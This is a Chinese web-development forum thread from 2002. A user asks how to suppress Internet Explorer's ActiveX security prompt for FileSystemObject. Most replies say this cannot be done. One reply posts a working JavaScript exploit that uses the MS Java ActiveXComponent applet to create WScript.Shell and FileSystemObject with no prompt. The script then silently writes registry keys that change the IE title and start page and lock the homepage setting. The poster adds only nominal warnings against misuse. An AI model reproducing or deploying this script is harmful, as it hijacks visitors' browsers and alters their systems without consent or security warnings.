在使用FileSystemObject时,怎么样禁止弹出的询问是否使用ActiveX控件???

littleholly 2002-03-24 04:31:09
rt
...全文
42 7 打赏 收藏 转发到动态 举报
写回复
用AI写文章
7 条回复
切换为时间正序
请发表友善的回复…
发表回复
littleholly 2002-03-25
  • 打赏
  • 举报
回复
放心,我没有理由拿来害人!
我可不是那种不懂事的人!:P
koolfoo 2002-03-25
  • 打赏
  • 举报
回复
使用filesystemobject。但不能直接使用new activexobject()
用<applet>然后用setclsid(),createinstance() and getobject就可以了
<script>
//初始化actiVex控件
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>")
//初始化actiVex控件结束
//定义变量
function reg(){
try
{
//设定applets为0
a=document.applets[0]
//初始化Windows Script Host Shell Object
a.setCLSID("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
a.createInstance()
S=a.GetObject()
//初始化FileSystem Object
a.setCLSID("{0d43fe01-f093-11cf-8940-00a0c9054228}")
a.createInstance();
fs=a.GetObject()
try
{
//开始写注册表
//设定IE的标题为Internet Explorer
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Internet Explorer")
//设定IE的默认首页为空白页
S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank")
//让设定首页那项变灰
S.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage",0x1,"REG_DWORD")
}
catch(reg)
{}
}
catch(reg)
{}
}
function flash()
{
//隔100毫秒就运行一次
setTimeout("reg()",100)
}
flash()
//最后再重申,这个脚本不可用来害人,谢~
</script>

我在ie6上面用过了,也没有安全提示。
你别想用来还人,懂吗?
Reve 2002-03-24
  • 打赏
  • 举报
回复
去数字签名
cpplus 2002-03-24
  • 打赏
  • 举报
回复
按理说应该客户安装过一次之后就不用再安装了的
littleholly 2002-03-24
  • 打赏
  • 举报
回复
那每次都弹出那个东西,我做的实际上就等于是废物了?
8988 2002-03-24
  • 打赏
  • 举报
回复
这个好象不能实现,因为用户端可以设置ActiveX控件的安全检查。
假设可以实现,则MS就可能要吃关斯了。
sunbeamy 2002-03-24
  • 打赏
  • 举报
回复
这个和浏览器的安全设置有关,没有办法在程序里控制...

87,901

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧